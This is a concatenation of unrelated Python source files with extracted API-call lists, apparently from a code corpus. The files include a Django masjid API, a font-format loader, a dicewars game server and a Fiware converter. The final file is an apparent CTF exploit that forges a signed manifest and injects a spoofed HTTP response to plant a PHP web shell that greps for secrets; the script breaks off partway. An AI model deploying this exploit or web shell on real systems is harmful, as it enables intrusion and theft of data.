(21590, 21741), True, 'import numpy as np\n'), ((28683, 28695), 'numpy.log', 'np.log', (['(10.0)'], {}), '(10.0)\n', (28689, 28695), True, 'import numpy as np\n'), ((29260, 29272), 'numpy.log', 'np.log', (['(10.0)'], {}), '(10.0)\n', (29266, 29272), True, 'import numpy as np\n'), ((29847, 29859), 'numpy.log', 'np.log', (['(10.0)'], {}), '(10.0)\n', (29853, 29859), True, 'import numpy as np\n'), ((22820, 22851), 'numpy.linalg.solve', 'np.linalg.solve', (['a', 'composition'], {}), '(a, composition)\n', (22835, 22851), True, 'import numpy as np\n')]
|
from django.shortcuts import render
from .models import Masjid, SalahTime
from .serializers import MasjidSerializer, SalahTimeSerializer
from rest_framework import viewsets
from rest_framework.decorators import api_view
from masjid.models import Masjid
from rest_framework.response import Response
from rest_framework import status
from rest_framework_extensions.mixins import NestedViewSetMixin
from users.models import CustomUser
class MasjidViewSet(viewsets.ModelViewSet):
queryset = Masjid.objects.all()
serializer_class = MasjidSerializer
class SalahTimeViewSet(viewsets.ModelViewSet):
queryset = SalahTime.objects.all()
serializer_class = SalahTimeSerializer
@api_view(['GET'])
def getAllMasjid(request):
if request.method == 'GET':
masjids = Masjid.objects.all()
masjid_dict = {}
masjid_list = []
if masjids:
for obj in masjids:
masjid_id = obj.id
try:
salatime_obj = SalahTime.objects.get(masjid_id=masjid_id)
except SalahTime.DoesNotExist:
salatime_obj = None
try:
masjid_user = CustomUser.objects.get(id=obj.masjid_user)
except CustomUser.DoesNotExist:
masjid_user = None
salatime_obj_dict = {}
if salatime_obj:
salatime_obj_dict = {
"id": salatime_obj.id,
"fajar_azan":salatime_obj.fajar_azan ,
"fajar_prayer":salatime_obj.fajar_prayer ,
"dhuhr_azan":salatime_obj.Dhuhr_azan ,
"dhuhr_prayer":salatime_obj.Dhuhr_prayer ,
"asr_azan":salatime_obj.Asr_azan ,
"asr_prayer":salatime_obj.Asr_prayer ,
"maghrib_azan":salatime_obj.Maghrib_azan ,
"maghrib_prayer":salatime_obj.Maghrib_prayer ,
"isha_azan":salatime_obj.Isha_azan ,
"isha_prayer":salatime_obj.Isha_prayer ,
"jummah_azan":salatime_obj.jummah_azan ,
"jummah_prayer":salatime_obj.jummah_prayer ,
}
if masjid_user.profile_pic:
masjid_dict = {
"id":obj.id,
"name":obj.name,
"address":obj.address,
"profile_pic":masjid_user.profile_pic.url,
"salatime": salatime_obj_dict,
}
masjid_list.append(masjid_dict)
else:
masjid_dict = {
"id":obj.id,
"name":obj.name,
"address":obj.address,
"profile_pic":None,
"salatime": salatime_obj_dict,
}
masjid_list.append(masjid_dict)
return Response({
"status": status.HTTP_200_OK,
"masjid_list":masjid_list
})
else:
return Response({
"status": status.HTTP_204_NO_CONTENT,
"message": "No any masjid found",
})
return Response({"message": "Method not allowed"})
|
[
"rest_framework.response.Response",
"rest_framework.decorators.api_view",
"masjid.models.Masjid.objects.all",
"users.models.CustomUser.objects.get"
] |
[((686, 703), 'rest_framework.decorators.api_view', 'api_view', (["['GET']"], {}), "(['GET'])\n", (694, 703), False, 'from rest_framework.decorators import api_view\n'), ((493, 513), 'masjid.models.Masjid.objects.all', 'Masjid.objects.all', ([], {}), '()\n', (511, 513), False, 'from masjid.models import Masjid\n'), ((3351, 3394), 'rest_framework.response.Response', 'Response', (["{'message': 'Method not allowed'}"], {}), "({'message': 'Method not allowed'})\n", (3359, 3394), False, 'from rest_framework.response import Response\n'), ((781, 801), 'masjid.models.Masjid.objects.all', 'Masjid.objects.all', ([], {}), '()\n', (799, 801), False, 'from masjid.models import Masjid\n'), ((3049, 3117), 'rest_framework.response.Response', 'Response', (["{'status': status.HTTP_200_OK, 'masjid_list': masjid_list}"], {}), "({'status': status.HTTP_200_OK, 'masjid_list': masjid_list})\n", (3057, 3117), False, 'from rest_framework.response import Response\n'), ((3197, 3283), 'rest_framework.response.Response', 'Response', (["{'status': status.HTTP_204_NO_CONTENT, 'message': 'No any masjid found'}"], {}), "({'status': status.HTTP_204_NO_CONTENT, 'message':\n 'No any masjid found'})\n", (3205, 3283), False, 'from rest_framework.response import Response\n'), ((1180, 1222), 'users.models.CustomUser.objects.get', 'CustomUser.objects.get', ([], {'id': 'obj.masjid_user'}), '(id=obj.masjid_user)\n', (1202, 1222), False, 'from users.models import CustomUser\n')]
|
# from .offscreen_context import OffscreenContext
import os
if os.environ.get("PYOPENGL_PLATFORM", None) == "egl":
from .egl_offscreen_context import OffscreenContext
else:
from .glfw_offscreen_context import OffscreenContext
from .fbo import Framebuffer
from .renderbuffer import Renderbuffer, RenderbufferMultisample
from .texture import (
Texture,
TextureMultisample,
Texture1D,
Texture3D,
loadTexture,
)
from .shader import Shader
from .shader_storage_buffer import ShaderStorage
from .vertexbuffer import Vertexbuffer
from .vao import VAO
from .ibo import IBO
from .ebo import EBO
from .camera import Camera
# from .window import Window
from .material import Material
from . import geometry as geo
from .tiles import tiles, tiles4
from . import meshutil
from . import utils
from . import glcontext
from . import glrenderer
|
[
"os.environ.get"
] |
[((64, 105), 'os.environ.get', 'os.environ.get', (['"""PYOPENGL_PLATFORM"""', 'None'], {}), "('PYOPENGL_PLATFORM', None)\n", (78, 105), False, 'import os\n')]
|
"""
monobit.hex - Unifont Hex format
(c) 2019--2021 <NAME>
licence: https://opensource.org/licenses/MIT
"""
# HEX format documentation
# http://czyborra.com/unifont/
import logging
import string
from ..storage import loaders, savers
from ..streams import FileFormatError
from ..font import Font
from ..glyph import Glyph
@loaders.register('hext', name='PC-BASIC Extended HEX')
def load_hext(instream, where=None):
"""Load 8xN multi-cell font from PC-BASIC extended .HEX file."""
return _load_hex(instream.text)
@loaders.register('hex', name='Unifont HEX')
def load_hex(instream, where=None):
"""Load 8x16 multi-cell font from Unifont .HEX file."""
return _load_hex(instream.text)
@savers.register(linked=load_hex)
def save_hex(fonts, outstream, where=None):
"""Save 8x16 multi-cell font to Unifont .HEX file."""
font = _validate(fonts)
_save_hex(font, outstream.text, _fits_in_hex)
@savers.register(linked=load_hext)
def save_hext(fonts, outstream, where=None):
"""Save 8xN multi-cell font to PC-BASIC extended .HEX file."""
font = _validate(fonts)
_save_hex(font, outstream.text, _fits_in_hext)
def _validate(fonts):
"""Check if font fits in file format."""
if len(fonts) > 1:
raise FileFormatError('Can only save one font to hex file.')
font, = fonts
if font.spacing not in ('character-cell', 'multi-cell'):
raise FileFormatError(
'This format only supports character-cell or multi-cell fonts.'
)
return font
##############################################################################
# loader
def _load_hex(instream):
"""Load font from a .hex file."""
global_comment = []
glyphs = []
comment = []
for line in instream:
line = line.rstrip('\r\n')
if ':' in line:
# parse code line
key, value = line.rsplit(':', 1)
value = value.strip()
if (
# preserve empty lines if they separate comments
(not line and comment and comment[-1] != '')
# marked as comment
or line[0] == '#'
# pass through lines without : as comments - allows e.g. to convert diffs, like hexdraw
or (':' not in line)
# not a valid line, treat as comment
or set(value) - set(string.hexdigits + ',')
):
comment.append(line)
else:
# when first glyph is found, split comment lines between global and glyph
if not glyphs and comment:
global_comment, comment = split_global_comment(comment)
glyphs.append(_convert_glyph(key, value, comment))
comment = []
# preserve any comment at end of file as part of global comment
global_comment = '\n'.join([*_clean_comment(global_comment), *_clean_comment(comment)])
return Font(glyphs, comments=global_comment, properties=dict(encoding='unicode'))
def _convert_label(key):
"""Ctreate char label from key string."""
try:
return ''.join(chr(int(_key, 16)) for _key in key.split(','))
except ValueError:
return ''
def _convert_glyph(key, value, comment):
"""Create Glyph object from key string and hex value."""
# determine geometry
# two standards: 8-pix wide, or 16-pix wide
# if height >= 32, they conflict
num_bytes = len(value) // 2
if num_bytes < 32:
width, height = 8, num_bytes
else:
width, height = 16, num_bytes // 2
# get labels
char = _convert_label(key)
return Glyph.from_hex(value, width, height).modify(
char=char, tags=([key] if not char else []),
comments=_clean_comment(comment)
)
def _clean_comment(lines):
"""Remove leading characters from comment."""
while lines and not lines[-1]:
lines = lines[:-1]
if not lines:
return []
lines = [_line or '' for _line in lines]
# remove "comment char" - non-alphanumeric shared first character
firsts = str(set(_line[0:1] for _line in lines if _line))
if len(firsts) == 1 and firsts not in string.ascii_letters + string.digits:
lines = [_line[1:] for _line in lines]
# remove one leading space
if all(_line.startswith(' ') for _line in lines if _line):
lines = [_line[1:] for _line in lines]
return lines
def split_global_comment(lines):
"""Split top comments into global and first glyph comment."""
while lines and not lines[-1]:
lines = lines[:-1]
try:
splitter = lines[::-1].index('')
except ValueError:
global_comment = lines
lines = []
else:
global_comment = lines[:-splitter-1]
lines = lines[-splitter:]
return global_comment, lines
##############################################################################
# saver
def _save_hex(font, outstream, fits):
"""Save 8x16 multi-cell font to Unifont or PC-BASIC Extended .HEX file."""
# global comment
if font.get_comments():
outstream.write(_format_comment(font.get_comments(), comm_char='#') + '\n\n')
# glyphs
for glyph in font.glyphs:
if fits(glyph):
outstream.write(_format_glyph(glyph))
else:
logging.warning('Skipping %s: %s', glyph.char, glyph.as_hex())
def _fits_in_hex(glyph):
"""Check if glyph fits in Unifont Hex format."""
if len(glyph.char) > 1:
logging.warning('Hex format does not support multi-codepoint grapheme clusters.')
return False
if glyph.height != 16 or glyph.width not in (8, 16):
logging.warning(
'Hex format only supports 8x16 or 16x16 glyphs, '
f'glyph {glyph.char} is {glyph.width}x{glyph.height}.'
)
return False
return True
def _fits_in_hext(glyph):
"""Check if glyph fits in PC-BASIC Extended Hex format."""
if glyph.width not in (8, 16):
logging.warning(
'Extended Hex format only supports glyphs of width 8 or 16 pixels, '
f'glyph {glyph.char} is {glyph.width}x{glyph.height}.'
)
return False
if glyph.height >= 32:
logging.warning(
'Extended Hex format only supports glyphs less than 32 pixels high, '
f'glyph {glyph.char} is {glyph.width}x{glyph.height}.'
)
return False
return True
def _format_glyph(glyph):
"""Format glyph line for hex file."""
return (
# glyph comment
('' if not glyph.comments else '\n' + _format_comment(glyph.comments, comm_char='#') + '\n')
+ '{}:{}\n'.format(
# label
u','.join(f'{ord(_c):04X}' for _c in glyph.char),
# hex code
glyph.as_hex().upper()
)
)
def _format_comment(comment, comm_char):
"""Format a multiline comment."""
return '\n'.join(f'{comm_char} {_line}' for _line in comment.splitlines())
|
[
"logging.warning"
] |
[((5444, 5530), 'logging.warning', 'logging.warning', (['"""Hex format does not support multi-codepoint grapheme clusters."""'], {}), "(\n 'Hex format does not support multi-codepoint grapheme clusters.')\n", (5459, 5530), False, 'import logging\n'), ((5612, 5740), 'logging.warning', 'logging.warning', (['f"""Hex format only supports 8x16 or 16x16 glyphs, glyph {glyph.char} is {glyph.width}x{glyph.height}."""'], {}), "(\n f'Hex format only supports 8x16 or 16x16 glyphs, glyph {glyph.char} is {glyph.width}x{glyph.height}.'\n )\n", (5627, 5740), False, 'import logging\n'), ((5938, 6085), 'logging.warning', 'logging.warning', (['f"""Extended Hex format only supports glyphs of width 8 or 16 pixels, glyph {glyph.char} is {glyph.width}x{glyph.height}."""'], {}), "(\n f'Extended Hex format only supports glyphs of width 8 or 16 pixels, glyph {glyph.char} is {glyph.width}x{glyph.height}.'\n )\n", (5953, 6085), False, 'import logging\n'), ((6169, 6317), 'logging.warning', 'logging.warning', (['f"""Extended Hex format only supports glyphs less than 32 pixels high, glyph {glyph.char} is {glyph.width}x{glyph.height}."""'], {}), "(\n f'Extended Hex format only supports glyphs less than 32 pixels high, glyph {glyph.char} is {glyph.width}x{glyph.height}.'\n )\n", (6184, 6317), False, 'import logging\n')]
|
import csv
def open_file_or_create(name: str, mode):
try:
return open(name, mode)
except:
f = open(name, 'a')
f.close()
return open(name, mode)
def import_csv(words_list: list, class_name, filename = 'data.csv'):
csv_file = open_file_or_create(filename, 'r')
csv_reader = csv.DictReader(csv_file)
for line in csv_reader:
word = line['word']
translate = line['translate']
is_learned = True if line['is_learned'] == 'True' else False
answers = line['answers'][1:-1].replace(' ', '').split(',')
for i in range(len(answers)):
if answers[i] == 'True':
answers[i] = True
elif answers[i] == 'False':
answers[i] = False
else:
answers = []
words_list.append(class_name(word=word, translate=translate, is_learned=is_learned, answers=answers))
csv_file.close()
def export_csv(words_list: list, file_name='data.csv'):
csv_file = open_file_or_create(file_name, 'w')
csv_writer = csv.DictWriter(csv_file, fieldnames=words_list[0].__dict__.keys())
csv_writer.writeheader()
for i in range(len(words_list)):
csv_writer.writerow(words_list[i].__dict__)
csv_file.close()
|
[
"csv.DictReader"
] |
[((323, 347), 'csv.DictReader', 'csv.DictReader', (['csv_file'], {}), '(csv_file)\n', (337, 347), False, 'import csv\n')]
|
import json
from json.decoder import JSONDecodeError
import logging
import random
import socket
import sys
from .player import Player
from .summary import GameSummary
MAX_PASS_ROUNDS = 8
MAX_BATTLES_PER_GAME = 10000 # obsevered maximum of 5671 over over 100k games
class Game:
"""Instance of the game
"""
def __init__(self, board, area_ownership, players, addr, port, nicknames_order):
"""Initialize game and connect clients
Parameters
----------
players : int
Number of players
addr : str
IP address of the server
port : int
Port number
Attributes
----------
buffer : int
Size of socket buffer
number_of_players : int
Number of players
"""
self.buffer = 65535
self.logger = logging.getLogger('SERVER')
self.address = addr
self.port = port
self.number_of_players = players
self.nb_players_alive = players
self.nb_consecutive_end_of_turns = 0
self.nb_battles = 0
self.create_socket()
self.board = board
self.initialize_players()
self.connect_clients()
if nicknames_order is not None:
self.adjust_player_order(nicknames_order)
self.report_player_order()
self.assign_areas_to_players(area_ownership)
self.logger.debug("Board initialized")
for player in self.players.values():
self.send_message(player, 'game_start')
self.summary = GameSummary()
def run(self):
"""Main loop of the game
"""
from dicewars.ml.game import serialise_game_configuration, save_game_configurations
configurations = set()
try:
for i in range(1, self.number_of_players + 1):
player = self.players[i]
self.send_message(player, 'game_state')
while True:
self.logger.debug("Current player {}".format(self.current_player.get_name()))
self.handle_player_turn()
if self.check_win_condition():
sys.stdout.write(str(self.summary))
for i, p in self.players.items():
if p.get_number_of_areas() == self.board.get_number_of_areas():
save_game_configurations(
winner_index=i,
configurations=configurations,
)
break
break
serialised_game = serialise_game_configuration(
board=self.board,
players=self.players,
)
configurations.add(serialised_game)
except KeyboardInterrupt:
self.logger.info("Game interrupted.")
for i in range(1, self.number_of_players + 1):
player = self.players[i]
self.send_message(player, 'close_socket')
except (BrokenPipeError, JSONDecodeError) as e:
self.logger.error("Connection to client failed: {0}".format(e))
except ConnectionResetError:
self.logger.error("ConnectionResetError")
try:
self.close_connections()
except BrokenPipeError:
pass
##############
# GAME LOGIC #
##############
def assign_area(self, area, player):
"""Assign area to a new owner
Parameters
----------
area : Area
Area to be assigned new owner to
player : Player
New owner
"""
area.set_owner_name(player.get_name())
player.add_area(area)
def handle_player_turn(self):
"""Handle clients message and carry out the action
"""
self.logger.debug("Handling player {} ({}) turn".format(self.current_player.get_name(), self.current_player.nickname))
player = self.current_player.get_name()
msg = self.get_message(player)
if msg['type'] == 'battle':
self.nb_consecutive_end_of_turns = 0
battle = self.battle(self.board.get_area_by_name(msg['atk']), self.board.get_area_by_name(msg['def']))
self.summary.add_battle()
self.logger.debug("Battle result: {}".format(battle))
for p in self.players:
self.send_message(self.players[p], 'battle', battle=battle)
elif msg['type'] == 'end_turn':
self.nb_consecutive_end_of_turns += 1
affected_areas = self.end_turn()
for p in self.players:
self.send_message(self.players[p], 'end_turn', areas=affected_areas)
def get_state(self):
"""Get game state
Returns
-------
dict
Dictionary containing owner, dice and adjacent areas of
each area, as well as score of each player
"""
game_state = {
'areas': {}
}
for a in self.board.areas:
area = self.board.areas[a]
game_state['areas'][area.name] = {
'adjacent_areas': area.get_adjacent_areas_names(),
'owner': area.get_owner_name(),
'dice': area.get_dice()
}
game_state['score'] = {}
for p in self.players:
player = self.players[p]
game_state['score'][player.get_name()] = player.get_largest_region(self.board)
return game_state
def battle(self, attacker, defender):
"""Carry out a battle
Returns
-------
dict
Dictionary with the result of the battle including information
about rolled numbers, dice left after the battle, and possible
new ownership of the areas
"""
self.nb_battles += 1
atk_dice = attacker.get_dice()
def_dice = defender.get_dice()
atk_pwr = def_pwr = 0
atk_name = attacker.get_owner_name()
def_name = defender.get_owner_name()
for i in range(0, atk_dice):
atk_pwr += random.randint(1, 6)
for i in range(0, def_dice):
def_pwr += random.randint(1, 6)
battle = {
'atk': {
'name': attacker.get_name(),
'dice': 1,
'owner': atk_name,
'pwr': atk_pwr
}
}
attacker.set_dice(1)
if atk_pwr > def_pwr:
defender.set_owner_name(atk_name)
self.players[atk_name].add_area(defender)
self.players[def_name].remove_area(defender)
if self.players[def_name].get_number_of_areas() == 0:
self.eliminate_player(def_name)
attacker.set_dice(1)
defender.set_dice(atk_dice - 1)
battle['def'] = {
'name': defender.get_name(),
'dice': atk_dice - 1,
'owner': atk_name,
'pwr': def_pwr
}
else:
battle['def'] = {
'name': defender.get_name(),
'dice': def_dice,
'owner': def_name,
'pwr': def_pwr
}
return battle
def end_turn(self):
"""Handles end turn command
Returns
-------
dict
Dictionary of affected areas including number of dice in these areas
"""
affected_areas = []
player = self.current_player
dice = player.get_reserve() + player.get_largest_region(self.board)
if dice > 64:
dice = 64
areas = []
for area in self.current_player.get_areas():
areas.append(area)
while dice and areas:
area = random.choice(areas)
if not area.add_die():
areas.remove(area)
else:
if area not in affected_areas:
affected_areas.append(area)
dice -= 1
player.set_reserve(dice)
self.set_next_player()
list_of_areas = {}
for area in affected_areas:
list_of_areas[area.get_name()] = {
'owner': area.get_owner_name(),
'dice': area.get_dice()
}
return list_of_areas
def set_first_player(self):
"""Set first player
"""
for player in self.players:
if self.players[player].get_name() == self.players_order[0]:
self.current_player = self.players[player]
self.logger.debug("Current player: {}".format(self.current_player.get_name()))
return
def set_next_player(self):
"""Set next player in order as a current player
"""
current_player_name = self.current_player.get_name()
current_idx = self.players_order.index(current_player_name)
idx = self.players_order[(current_idx + 1) % self.number_of_players]
while True:
try:
if self.players[idx].get_number_of_areas() == 0:
current_idx = (current_idx + 1) % self.number_of_players
idx = self.players_order[(current_idx + 1) % self.number_of_players]
continue
self.current_player = self.players[idx]
self.logger.debug("Current player: {}".format(self.current_player.get_name()))
except IndexError:
exit(1)
return
def eliminate_player(self, player):
nickname = self.players[player].get_nickname()
self.summary.add_elimination(nickname, self.summary.nb_battles)
self.logger.info("Eliminated player {} ({})".format(player, nickname))
self.nb_players_alive -= 1
def check_win_condition(self):
"""Check win conditions
Returns
-------
bool
True if a player has won, False otherwise
"""
if self.nb_consecutive_end_of_turns // self.nb_players_alive == MAX_PASS_ROUNDS:
self.logger.info("Game cancelled because the limit of {} rounds of passing has been reached".format(MAX_PASS_ROUNDS))
for p in self.players.values():
if p.get_number_of_areas() > 0:
self.eliminate_player(p.get_name())
self.process_win(None, -1)
return True
if self.nb_battles == MAX_BATTLES_PER_GAME:
self.logger.info("Game cancelled because the limit of {} battles has been reached".format(MAX_BATTLES_PER_GAME))
for p in self.players.values():
if p.get_number_of_areas() > 0:
self.eliminate_player(p.get_name())
self.process_win(None, -1)
return True
for p in self.players:
player = self.players[p]
if player.get_number_of_areas() == self.board.get_number_of_areas():
self.process_win(player.get_nickname(), player.get_name())
return True
return False
def process_win(self, player_nick, player_name):
self.summary.set_winner(player_nick)
self.logger.info("Player {} ({}) wins!".format(player_nick, player_name))
for i in self.players:
self.send_message(self.players[i], 'game_end', winner=player_name)
##############
# NETWORKING #
##############
def get_message(self, player):
"""Read message from client
Parameters
----------
player : int
Name of the client
Returns
-------
str
Decoded message from the client
"""
raw_message = self.client_sockets[player].recv(self.buffer)
msg = json.loads(raw_message.decode())
self.logger.debug("Got message from client {}; type: {}".format(player, msg['type']))
return msg
def send_message(self, client, type, battle=None, winner=None, areas=None):
"""Send message to a client
Parameters
----------
client : Player
Recepient of the message
type : str
Type of message
battle : dict
Result of a battle
winner : int
Winner of the game
areas : list of int
Areas changed during the turn
"""
self.logger.debug("Sending msg type '{}' to client {}".format(type, client.get_name()))
if type == 'game_start':
msg = self.get_state()
msg['type'] = 'game_start'
msg['player'] = client.get_name()
msg['no_players'] = self.number_of_players
msg['current_player'] = self.current_player.get_name()
msg['board'] = self.board.get_board()
msg['order'] = self.players_order
elif type == 'game_state':
msg = self.get_state()
msg['type'] = 'game_state'
msg['player'] = client.get_name()
msg['no_players'] = self.number_of_players
msg['current_player'] = self.current_player.get_name()
elif type == 'battle':
msg = self.get_state()
msg['type'] = 'battle'
msg['result'] = battle
elif type == 'end_turn':
msg = self.get_state()
msg['type'] = 'end_turn'
msg['areas'] = areas
msg['current_player'] = self.current_player.get_name()
msg['reserves'] = {
i: self.players[i].get_reserve() for i in self.players
}
elif type == 'game_end':
msg = {
'type': 'game_end',
'winner': winner
}
elif type == 'close_socket':
msg = {'type': 'close_socket'}
msg = json.dumps(msg)
client.send_message(msg + '\0')
def create_socket(self):
"""Initiate server socket
"""
try:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind((self.address, self.port))
self.logger.debug("Server socket at {}:{}".format(self.address, self.port))
except OSError as e:
self.logger.error("Cannot create socket. {0}.".format(e))
exit(1)
def connect_clients(self):
"""Connect all clients
"""
self.client_sockets = {}
self.socket.listen(self.number_of_players)
self.logger.debug("Waiting for clients to connect")
for i in range(1, self.number_of_players + 1):
self.connect_client(i)
hello_msg = self.get_message(i)
if hello_msg['type'] != 'client_desc':
raise ValueError("Client send a wrong-type hello message '{}'".format(hello_msg))
self.players[i].set_nickname(hello_msg['nickname'])
self.logger.debug("Successfully assigned clients to all players")
def connect_client(self, i):
"""Assign client to an instance of Player
"""
sock, client_address = self.socket.accept()
self.add_client(sock, client_address, i)
def add_client(self, connection, client_address, i):
"""Add client's socket to an instance of Player
Parameters
----------
connection : socket
Client's socket
client_addres : (str, int)
Client's address and port number
i : int
Player's name
Returns
-------
Player
Instance of Player that the client was assigned to
"""
self.client_sockets[i] = connection
player = self.assign_player_to_client(connection, client_address)
if not player:
raise Exception("Could not assign player to client {}".format(client_address))
else:
return player
def assign_player_to_client(self, socket, client_address):
"""Add client's socket to an unassigned player
"""
player = self.get_unassigned_player()
if player:
player.assign_client(socket, client_address)
return player
else:
return False
def get_unassigned_player(self):
"""Get a player with unassigned client
"""
for player in self.players:
if not self.players[player].has_client():
return self.players[player]
return False
def close_connections(self):
"""Close server's socket
"""
self.logger.debug("Closing server socket")
self.socket.close()
##################
# INITIALIZATION #
##################
def initialize_players(self):
self.players = {}
for i in range(1, self.number_of_players + 1):
self.players[i] = Player(i)
self.players_order = list(range(1, self.number_of_players + 1))
random.shuffle(self.players_order)
self.set_first_player()
self.logger.debug("Player order {0}".format(self.players_order))
def assign_areas_to_players(self, ownership):
"""Assigns areas to players at the start of the game
"""
assert(len(ownership) == self.board.get_number_of_areas())
for area_name, player_name in ownership.items():
area = self.board.get_area_by_name(area_name)
self.assign_area(area, self.players[player_name])
def adjust_player_order(self, nicknames_order):
renumbering = {old_name: nicknames_order.index(player.nickname)+1 for old_name, player in self.players.items()}
self.players = {renumbering[old_name]: player for old_name, player in self.players.items()}
for name, player in self.players.items():
player.name = name
self.client_sockets = {renumbering[old_name]: socket for old_name, socket in self.client_sockets.items()}
registered_nicknames_rev = {player.nickname: player_name for player_name, player in self.players.items()}
assert(len(nicknames_order) == len(registered_nicknames_rev))
assert(set(nicknames_order) == set(registered_nicknames_rev.keys()))
self.players_order = []
for nick in nicknames_order:
self.players_order.append(registered_nicknames_rev[nick])
self.set_first_player()
def report_player_order(self):
self.logger.info('Player order: {}'.format([(name, self.players[name].nickname) for name in self.players_order]))
|
[
"random.randint",
"dicewars.ml.game.serialise_game_configuration",
"random.shuffle",
"socket.socket",
"random.choice",
"json.dumps",
"dicewars.ml.game.save_game_configurations",
"logging.getLogger"
] |
[((859, 886), 'logging.getLogger', 'logging.getLogger', (['"""SERVER"""'], {}), "('SERVER')\n", (876, 886), False, 'import logging\n'), ((13851, 13866), 'json.dumps', 'json.dumps', (['msg'], {}), '(msg)\n', (13861, 13866), False, 'import json\n'), ((17013, 17047), 'random.shuffle', 'random.shuffle', (['self.players_order'], {}), '(self.players_order)\n', (17027, 17047), False, 'import random\n'), ((6164, 6184), 'random.randint', 'random.randint', (['(1)', '(6)'], {}), '(1, 6)\n', (6178, 6184), False, 'import random\n'), ((6245, 6265), 'random.randint', 'random.randint', (['(1)', '(6)'], {}), '(1, 6)\n', (6259, 6265), False, 'import random\n'), ((7838, 7858), 'random.choice', 'random.choice', (['areas'], {}), '(areas)\n', (7851, 7858), False, 'import random\n'), ((14022, 14071), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (14035, 14071), False, 'import socket\n'), ((2639, 2707), 'dicewars.ml.game.serialise_game_configuration', 'serialise_game_configuration', ([], {'board': 'self.board', 'players': 'self.players'}), '(board=self.board, players=self.players)\n', (2667, 2707), False, 'from dicewars.ml.game import serialise_game_configuration, save_game_configurations\n'), ((2377, 2448), 'dicewars.ml.game.save_game_configurations', 'save_game_configurations', ([], {'winner_index': 'i', 'configurations': 'configurations'}), '(winner_index=i, configurations=configurations)\n', (2401, 2448), False, 'from dicewars.ml.game import serialise_game_configuration, save_game_configurations\n')]
|
# Copyright 2018 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" This Module converts Python-Objects into the Fiware-JSON-Format.
For more Information how to use this class, see the Readme.md
You can find the needed Files to convert from an Object into JSON
in the folder JsonToObject and vice versa
"""
import json
import sys, os
# Adding This Sub-Project into the PythonPath
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
from json_to_object.reverse_entity import ReverseEntity
from object_to_json.entity import Entity
class ObjectFiwareConverter(object):
""" This class should be primarily used to convert a Object <-> JSON-string.
The classes in subdirectories are either used to convert them into JSON
or into a Python-specific-Object.
"""
@classmethod
def obj2Fiware(clsself, _object, ind=0, dataTypeDict={}, ignorePythonMetaData=False, showIdValue=True, encode=False):
en = Entity()
en.setObject(_object, dataTypeDict, ignorePythonMetaData, showIdValue= showIdValue, encode=encode)
return clsself._json(en, ind)
@classmethod
def fiware2Obj(clsself, _fiwareEntity, _objectStructure={}, useMetaData=True, ignoreWrongDataType=False, setAttr=False, encoded=False):
jsonObj= None
if(type(_fiwareEntity) is str):
jsonObj = clsself._obj(_fiwareEntity)
else:
jsonObj = _fiwareEntity
re = ReverseEntity(**jsonObj)
return re.setObject(_objectStructure, useMetaData, ignoreWrongDataType, setAttr, encoded=encoded)
@classmethod
def _complex_handler(clsself, Obj):
if hasattr(Obj, '__dict__'):
return Obj.__dict__
else:
raise TypeError('Object of type %s with value of %s is not JSON serializable' % (
type(Obj), repr(Obj)))
@classmethod
def _json(clsself, obj, ind=0):
return json.dumps(obj.__dict__, default=clsself._complex_handler, indent=ind)
@classmethod
def _obj(clsself, json_str):
return json.loads(json_str)
|
[
"json_to_object.reverse_entity.ReverseEntity",
"json.loads",
"os.path.realpath",
"json.dumps",
"object_to_json.entity.Entity"
] |
[((962, 988), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (978, 988), False, 'import sys, os\n'), ((1495, 1503), 'object_to_json.entity.Entity', 'Entity', ([], {}), '()\n', (1501, 1503), False, 'from object_to_json.entity import Entity\n'), ((1982, 2006), 'json_to_object.reverse_entity.ReverseEntity', 'ReverseEntity', ([], {}), '(**jsonObj)\n', (1995, 2006), False, 'from json_to_object.reverse_entity import ReverseEntity\n'), ((2457, 2527), 'json.dumps', 'json.dumps', (['obj.__dict__'], {'default': 'clsself._complex_handler', 'indent': 'ind'}), '(obj.__dict__, default=clsself._complex_handler, indent=ind)\n', (2467, 2527), False, 'import json\n'), ((2594, 2614), 'json.loads', 'json.loads', (['json_str'], {}), '(json_str)\n', (2604, 2614), False, 'import json\n')]
|
#!/usr/bin/python3
import socket
import requests
import sys
if len(sys.argv) < 3:
print("Usage: ./startup_sploit <host> <my_ip>")
exit(1)
PORT = 3255
HOST = sys.argv[1]
MYIP = sys.argv[2]
MYPORT = "0" * (921-len(MYIP)) + "4000"
MANIFEST = '{"links": [{"url": "http://mirror/wyjzmw.php", "checksum": "32bfce7a147d2fb0c87ff234c2848a37"}, {"url": "http://mirror/JhXY.php", "checksum": "d55ec508be338092ab591f3d7e4ab929"}]}'
SIGNATURE = 'c2f5e7a6e44e2fc4076a5930df75b02220c5f9313e0f3faa7ecb4e281dca359bc12426715e7c2902934e6995c9cdbcda93b8c4e0e5993f25309267b79978f504'
FAKE_PHP = br"""<?php if($_GET["key"]=="KnfSM")system("grep '=\";' *")?>"""
PAYLOAD = b"""AAAAAA
Url: http://%s:%s/JhXY.php
Success: true
Hashsum: d55ec508be338092ab591f3d7e4ab929\n\n\n\n\n\n\n\n\n\n
Content-Length: %d
%s""" % (MYIP.encode(), MYPORT.encode(), len(FAKE_PHP), FAKE_PHP)
ANS = b"""HTTP/1.1 200 OK
Content-Length: %d
%s?>""" % (len(PAYLOAD), PAYLOAD)
c = socket.socket()
c.connect((HOST, PORT))
from_client = c.makefile("r")
to_client = c.makefile("w")
print(from_client.readline().strip())
print(from_client.readline().strip())
to_client.write("%s:%s\n" % (MYIP, MYPORT)); to_client.flush()
print(from_client.readline().strip())
to_client.write(MANIFEST+"\n"); to_client.flush()
print(from_client.readline().strip())
to_client.write(SIGNATURE+"\n"); to_client.flush()
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", int(MYPORT)))
